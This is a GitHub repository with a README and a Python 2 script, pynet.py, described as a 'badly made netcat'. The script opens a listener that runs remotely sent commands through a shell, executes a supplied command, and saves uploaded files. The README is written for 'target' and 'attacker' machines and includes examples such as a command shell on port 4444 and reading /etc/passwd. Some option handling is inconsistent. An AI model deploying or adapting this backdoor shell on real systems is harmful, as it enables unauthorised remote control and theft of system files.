├── README.md └── pynet.py /README.md: -------------------------------------------------------------------------------- 1 | # Python-Net-Tool 2 | Python Net Tool is a simple networking tool made in python 3 | that allows, 4 | read and write data over network connections, using TCP protocols 5 | (a badly made netcat) 6 | 7 | ## Installation 8 | you will only need python2 installed (yes python2 bruh) 9 | 10 | ## usage 11 | 12 | ``` 13 | python2 pynet.py -h 14 | ``` 15 | ``` 16 | Python Net Tool 17 | 18 | Como usar: pynet.py -t host_alvo -p 19 | -l --listen - Ira "escutar" em [host]:[port] para 20 | entrada de conexões 21 | -e --execute=file_to_run - executa o arquivo fornecido em uma 22 | conexao recebida 23 | -c --command - Inicia uma command shell 24 | -u --upload=destino - Ao receber a conexao faz um upload 25 | pra [destino] 26 | 27 | ``` 28 | ### Flags 29 | ``` 30 | -l --listem - will allow us to listen in [host]:[port] to 31 | connections input 32 | ``` 33 | ``` 34 | -e --execute=file_to_run - runs the supplied file in a 35 | incoming connection 36 | ``` 37 | ``` 38 | -c --command - Start a command shell when the connection is received 39 | ``` 40 | ``` 41 | -u --upload=path - Upon receiving the connection, upload it to [destination] 42 | ``` 43 | 44 | Examples 45 | 46 | On target machine 47 | ``` 48 | python2 pynet.py -l -p 4444 -c 49 | ``` 50 | ![pynet](https://user-images.githubusercontent.com/62577914/100960050-e7788800-34f5-11eb-8d20-a9544134cf75.png) 51 | 52 | On attacker machine 53 | ``` 54 | python2 pynet.py -a 192.168.0.107 -p 4444 55 | ``` 56 | ![eita](https://user-images.githubusercontent.com/62577914/100960122-08d97400-34f6-11eb-8319-b0aaf6a0a743.png) 57 | 58 | 59 | ### Another examples 60 | 61 | ``` 62 | pynet.py -a 192.168.0.1 -p 5555 -l -c 63 | pynet.py -a 192.168.0.1 -p 5555 -l -u=c:\\ alvo.exe 64 | pynet.py -a 192.168.0.1 -p 5555 -l -e="cat /etc/passwd" 65 | echo 'ABCDEFGHI' | ./pynet.py -t 192.168.0.105 -p 135 66 | ``` 67 | -------------------------------------------------------------------------------- /pynet.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Feito por Kripto-Sec(Jean) 4 | # Apenas para propositos educativos 5 | # Nao use para fins maliciosos 6 | # github: github.com/Kripto-Sec 7 | # Conhecimento nao e crime 8 | 9 | 10 | import sys 11 | import socket 12 | import getopt 13 | import threading 14 | import subprocess 15 | 16 | # Definindo algumas variaveis globais 17 | listen = False 18 | command = False 19 | upload = False 20 | execute = "" 21 | alvo = "" 22 | upload_destino = "" 23 | port = 0 24 | 25 | 26 | 27 | 28 | def run_command(command): 29 | # corta a nova linha 30 | command = command.rstrip() 31 | 32 | # executa o comando e obtem a saida de volta 33 | try: 34 | output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True) 35 | except: 36 | output = "Erro ao executar comando. \r\n" 37 | 38 | #envia o output de volta ao client 39 | return output 40 | 41 | 42 | 43 | 44 | def client_handler(client_socket): 45 | global upload 46 | global execute 47 | global command 48 | 49 | #check o upload 50 | if len(upload_destino): 51 | 52 | #Le em todos os bytes e escreve no destino 53 | file_buffer = "" 54 | 55 | # Continua lendo a data ate nenhuma esta mais disponivel 56 | while True: 57 | data = client_socket.recv(1024) 58 | 59 | if not data: 60 | break 61 | 62 | else: 63 | file_buffer += data 64 | 65 | # agora pegamos os byts e tentamos escrevê-los 66 | try: 67 | 68 | file_descriptor = open(upload_destino, "wb") 69 | file_descriptor.write(file_buffer) 70 | file_descriptor.close() 71 | 72 | # reconhece que escrevemos o arquivo 73 | client_socket.send("Arquivo salvo com sucesso em %s\r\n"% upload_destino) 74 | except: 75 | client_socket.send("Falha ao tentar salvar em %s\r\n"% upload_destino) 76 | 77 | # Check pra execucao do comando 78 | if len(execute): 79 | 80 | #roda o comando 81 | output = run_command(execute) 82 | 83 | client_socket.send(output) 84 | 85 | # Agora vamos para outro loop se a command shell for chamada 86 | if command: 87 | 88 | while True: 89 | # Mostra um prompt simples 90 | client_socket.send("Command >> ") 91 | 92 | #agora recebe ate vermos um feed de linhas 93 | 94 | cmd_buffer = "" 95 | while "\n" not in cmd_buffer: 96 | cmd_buffer += client_socket.recv(1024) 97 | 98 | # Envia de volta o output do comando 99 | response = run_command(cmd_buffer) 100 | 101 | # Manda de volta o response 102 | client_socket.send(response) 103 | 104 | 105 | 106 | def server_loop(): 107 | global alvo 108 | global port 109 | 110 | # se nenhum alvo for definido 111 | # nos iremos ouvir em todas as interfaces 112 | if not len(alvo): 113 | alvo = "0.0.0.0" 114 | 115 | server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 116 | server.bind((alvo,port)) 117 | print ('\033[1;96m'+"[+] Aguardando conexao em %s:%s"%(alvo, port))+'\033[0;0m' 118 | 119 | server.listen(5) 120 | 121 | while True: 122 | client_socket, addr = server.accept() 123 | print ('\033[1;96m'+"[+] Conexao iniciada em %s:%s"%(alvo, port))+'\033[0;0m' 124 | 125 | # Cria um topico novo para o client 126 | client_thread = threading.Thread(target=client_handler, args=(client_socket,)) 127 | client_thread.start() 128 | 129 | 130 | def client_sender(buffer): 131 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 132 | #print ("Conexão em %s:%s" %(alvo, port)) 133 | try: 134 | # conecta ao seu host alvo 135 | client.connect((alvo,port)) 136 | 137 | if len(buffer): 138 | client.send(buffer) 139 | 140 | while True: 141 | #agora espera a data voltar 142 | recv_len = 1 143 | response = "" 144 | 145 | while recv_len: 146 | 147 | data = client.recv(4096) 148 | recv_len = len(data) 149 | response+= data 150 | 151 | if recv_len < 4096: 152 | break 153 | 154 | print '\033[1;97m'+response, 155 | 156 | #espera por mais inputs 157 | buffer = raw_input("") 158 | buffer += "\n" 159 | 160 | # envia ela off 161 | client.send(buffer) 162 | 163 | except: 164 | 165 | print ('\033[1;31m'+"[*] Saindo!."+'\033[0;0m') 166 | 167 | #rompe a conexao 168 | client.close() 169 | 170 | 171 | def usar(): 172 | print ('\033[1;96m'+"Python Net Tool") 173 | print ("") 174 | print ("Como usar: pynet.py -t host_alvo -p") 175 | print ("-l --listen - Ira \"escutar\" em [host]:[port] para") 176 | print (" entrada de conexões") 177 | 178 | print ("-e --execute=file_to_run - executa o arquivo fornecido em uma") 179 | print (" conexao recebida") 180 | 181 | print ("-c --command - Inicia uma command shell") 182 | print ("-u --upload=destino - Ao receber a conexao faz um upload") 183 | print (" pra [destino]") 184 | 185 | print ("") 186 | print ("") 187 | print ("Exemplos: ") 188 | print ("pynet.py -a 192.168.0.1 -p 5555 -l -c") 189 | print ("pynet.py -a 192.168.0.1 -p 5555 -l -u=c:\\\ alvo.exe") 190 | print ("pynet.py -a 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"") 191 | print "echo 'ABCDEFGHI' | ./pynet.py -t 192.168.0.105 -p 135"+'\033[0;0m' 192 | sys.exit(0) 193 | 194 | 195 | 196 | 197 | def main(): 198 | global listen 199 | global port 200 | global execute 201 | global command 202 | global upload_destino 203 | global alvo 204 | 205 | if not len(sys.argv[1:]): 206 | usar() 207 | # Le as opcoes de linha de comando 208 | try: 209 | 210 | opts, args = getopt.getopt(sys.argv[1:],"hle:a:p:cu", 211 | ["help","listen", "execute", "alvo", "port", "command", "upload"]) 212 | except getopt.GetoptError as err: 213 | print str(err) 214 | usar() 215 | 216 | for o,a in opts: 217 | if o in ("-h", "--help"): 218 | usar() 219 | 220 | elif o in ("-l", "--listen"): 221 | listen = True 222 | 223 | elif o in ("-e", "--execute"): 224 | execute = a 225 | 226 | elif o in ("-c", "--commnadshell"): 227 | command = True 228 | 229 | elif o in ("-u", "upload"): 230 | upload_destino = a 231 | 232 | elif o in ("-a","--alvo" ): 233 | alvo = a 234 | 235 | elif o in ("-p", "--port"): 236 | port = int(a) 237 | 238 | else: 239 | assert False,"Opcao invalida" 240 | 241 | # vamos ouvir ou apenas enviar dados de stdin? 242 | if not listen and len(alvo) and port > 0: 243 | 244 | # ler no buffer a partir da linha de comando 245 | # isso ira bloquear, entao use CTRL-D se nao enviar input 246 | # para stdin 247 | print '\033[1;96m'+"Pressione CTRL-D para iniciar"+'\033[0;0m' 248 | buffer = sys.stdin.read() 249 | 250 | # envia data off 251 | client_sender(buffer) 252 | 253 | # nos iremos ouvir e potencialmente 254 | # upar coisas, executar comandos, e drop uma shell de volta 255 | # dependendo de nossas opções de linha de comando acima 256 | if listen: 257 | server_loop() 258 | 259 | 260 | 261 | main() 262 | 263 | 264 | --------------------------------------------------------------------------------